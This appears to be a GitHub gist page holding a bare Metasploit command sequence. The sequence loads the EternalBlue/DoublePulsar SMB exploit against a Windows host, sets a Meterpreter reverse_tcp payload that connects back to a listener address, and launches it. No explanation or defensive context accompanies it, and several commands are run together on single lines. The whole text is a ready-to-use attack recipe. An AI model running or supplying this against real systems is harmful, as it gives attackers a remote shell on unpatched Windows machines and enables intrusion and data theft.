You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
msfconsole
reload_all
use exploit/windows/smb/ms17_010_eternalblue_doublepulsar
# show optionsset RHOST 10.0.0.100
set TARGETARCHITECTURE x64
# show targets# set TARGET 9set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.11
exploit